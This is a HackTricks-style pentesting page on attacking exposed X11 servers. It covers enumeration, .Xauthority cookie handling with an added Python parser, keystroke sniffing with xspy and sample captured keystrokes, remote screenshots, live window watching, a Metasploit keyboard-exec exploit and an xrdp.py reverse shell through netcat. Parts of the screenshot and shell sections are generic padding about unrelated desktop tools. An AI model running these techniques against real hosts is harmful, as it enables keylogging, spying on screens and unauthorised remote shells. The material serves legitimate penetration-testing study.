6000 - Pentesting X11
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? Or do you want access to the latest version of PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the Telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Basic Information
The X Window System (also known as X) is a windowing system for bitmap displays, common on UNIX-based operating systems. X provides the basic framework for GUI-based environments. X does not mandate a particular user interface; that is handled by the individual programs.
Source: https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref
**Default port:** 6000
```
PORT     STATE SERVICE
6000/tcp open  X11
```
Enumeration
Check for anonymous connection:
```bash
nmap -sV --script x11-access -p <PORT> <IP>
msf> use auxiliary/scanner/x11/open_x11
```
Local Enumeration
The file **.Xauthority** in the user's home directory is **used by X11 for authorization**. From here:
MIT-magic-cookie-1: Generating 128 bits of key ("cookie"), storing it in ~/.Xauthority (or wherever the XAUTHORITY environment variable points to). The client sends it to the server in plain text! The server checks whether it has a copy of this "cookie" and, if so, the connection is permitted. The key is generated by DMX.
{% hint style="warning" %}
In order to use the cookie you should set the environment variable: export XAUTHORITY=/path/to/.Xauthority
{% endhint %}
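As an added example (not from the original page or the tools it cites), a small Python parser for the binary .Xauthority format described above, so a defender or auditor can inventory which hosts and displays a user's file holds cookies for without printing the cookies themselves. The entry layout (a big-endian u16 family followed by four length-prefixed fields: address, display number, auth name, auth data) follows libXau; the sample file is constructed inline and contains no real cookie.

```python
import struct
from collections import namedtuple

# Address-family constants from <X11/Xauth.h>; Internet addresses are raw IPv4 bytes, Local ones a hostname
FAMILIES = {0: "Internet", 6: "InternetV6", 254: "Netname", 256: "Local", 0xFFFF: "Wild"}
# name is the auth protocol (MIT-MAGIC-COOKIE-1 on this page); data is the secret cookie itself
XauthEntry = namedtuple("XauthEntry", "family address number name data")

def _counted(buf: bytes, off: int):
    """Read one big-endian u16 length followed by that many bytes; refuse truncated files."""
    if off + 2 > len(buf):
        raise ValueError("truncated length field at offset %d" % off)
    (n,) = struct.unpack_from(">H", buf, off)
    off += 2
    if off + n > len(buf):
        raise ValueError("truncated field at offset %d" % off)
    return buf[off:off + n], off + n

def parse_xauthority(buf: bytes) -> list:
    """Walk the file: each entry is a family u16 followed by four counted strings."""
    entries, off = [], 0
    while off < len(buf):
        if off + 2 > len(buf):
            raise ValueError("truncated family field at offset %d" % off)
        (family,) = struct.unpack_from(">H", buf, off)
        address, off = _counted(buf, off + 2)
        number, off = _counted(buf, off)
        name, off = _counted(buf, off)
        data, off = _counted(buf, off)
        entries.append(XauthEntry(family, address, number, name, data))
    return entries

def summarize(buf: bytes) -> list:
    """Per entry: (family, host, display, auth name, cookie length), never the cookie bytes themselves."""
    rows = []
    for e in parse_xauthority(buf):
        host = (".".join(str(b) for b in e.address)
                if e.family == 0 and len(e.address) == 4 else e.address.decode("latin-1"))
        rows.append((FAMILIES.get(e.family, str(e.family)), host,
                     e.number.decode("latin-1"), e.name.decode("latin-1"), len(e.data)))
    return rows

def build_entry(family: int, address: bytes, number: bytes, name: bytes, data: bytes) -> bytes:
    """Serialize one entry (the inverse of the parser); used here only to construct the sample."""
    pack = lambda b: struct.pack(">H", len(b)) + b
    return struct.pack(">H", family) + pack(address) + pack(number) + pack(name) + pack(data)

# Constructed sample file, not a real cookie: a Local entry for display :0 and an IPv4 entry for 10.5.5.12:0
SAMPLE = (build_entry(256, b"workstation", b"0", b"MIT-MAGIC-COOKIE-1", bytes(range(16)))
          + build_entry(0, bytes([10, 5, 5, 12]), b"0", b"MIT-MAGIC-COOKIE-1", b"\x41" * 16))
```

To audit a real file, read it with `open(path, "rb").read()` and pass the bytes to `summarize`; an entry with family Wild (0xFFFF) or an empty cookie is worth a closer look.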
Verify Connection
```bash
xdpyinfo -display <ip>:<display>
xwininfo -root -tree -display <IP>:<display> #Ex: xwininfo -root -tree -display 10.5.5.12:0
```
Keylogging
Use xspy to sniff the keyboard keystrokes.
Sample output:
```
xspy 10.9.xx.xx
opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab
```
Screenshot Capture
To capture screenshots during a penetration test, you can use various tools and techniques. Here are some common methods:
1. Scrot: a command-line tool that allows you to capture screenshots in Linux. Install it with `sudo apt-get install scrot`; then run `scrot screenshot.png`, which saves the screenshot as screenshot.png in the current directory.
2. Shutter: a feature-rich screenshot tool for Linux. Install it with `sudo apt-get install shutter`. Once installed, launch Shutter from the applications menu; it provides a graphical interface to capture screenshots and offers various editing options.
3. Flameshot: another popular screenshot tool for Linux. Install it with `sudo apt-get install flameshot`; then run `flameshot gui`, which opens the Flameshot interface, allowing you to capture and edit screenshots.
4. Snipping Tool (Windows): if you are using Windows, you can use the built-in Snipping Tool. Search for "Snipping Tool" in the Start menu and launch the application; it provides a user-friendly interface to capture screenshots.
5. Snip & Sketch (Windows 10): for Windows 10 users, Snip & Sketch is a built-in screenshot tool. Search for "Snip & Sketch" in the Start menu and launch the application; it offers various screenshot capture options and editing features.
Remember to use these tools responsibly and only capture screenshots within the scope of your penetration test.
To capture the remote X11 display itself:
```bash
xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
convert screenshot.xwd screenshot.png
```
Remote Desktop View
Source: https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref
```bash
./xrdp.py <IP:0>
```
From: https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html
First, we need to find the ID of the window using xwininfo.
```
xwininfo -root -display 10.9.xx.xx:0
xwininfo: Window id: 0x45 (the root window) (has no name)
Absolute upper-left X: 0
Absolute upper-left Y: 0
Relative upper-left X: 0
Relative upper-left Y: 0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners: +0+0 -0+0 -0-0 +0-0
-geometry 1024x768+0+0
```
XWatchwin
For live viewing we need to use xwatchwin; the window ID passed with -w is the one found with xwininfo.
```bash
./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName }
./xwatchwin 10.9.xx.xx:0 -w 0x45
```
Get Shell
To get a shell on a target system, you can exploit vulnerabilities in the X11 server or use X11 forwarding.
Exploiting X11 Server Vulnerabilities
- X11 Server Misconfiguration: Check if the X11 server is misconfigured and allows connections from unauthorized hosts. If so, you can connect to the X11 server and execute commands.
- X11 Server Buffer Overflow: Exploit buffer overflow vulnerabilities in the X11 server to execute arbitrary code and gain a shell.
- X11 Server Authentication Bypass: Exploit authentication bypass vulnerabilities in the X11 server to gain unauthorized access and execute commands.
Using X11 Forwarding
- SSH X11 Forwarding: If the target system has SSH enabled with X11 forwarding, you can use the `-X` or `-Y` option to enable X11 forwarding and run graphical applications remotely.
- X11 Forwarding over Netcat: Use Netcat to forward X11 traffic between the target system and your machine. This allows you to run X11 applications on the target system and interact with them remotely.
- X11 Forwarding over SSH Tunnel: Set up an SSH tunnel to forward X11 traffic between the target system and your machine. This allows you to securely run X11 applications on the target system and interact with them remotely.
Remember to always obtain proper authorization before attempting to gain shell access on a target system. Unauthorized access is illegal and unethical.
```bash
msf> use exploit/unix/x11/x11_keyboard_exec
```
Other way:
Reverse Shell: Xrdp also allows taking a reverse shell via Netcat. Type the following command:
```bash
./xrdp.py <IP:0> --no-disp
```
It will prompt a new control panel where we can see the R-shell option, as shown below:
We will start Netcat in listening mode on our local system on port 5555, as shown below:
Then add the IP and port, then select R-Shell, as shown below:
Now, as shown below, we have full access to the system:
{% embed url="https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref" %}
Shodan
```
port:6000 x11
```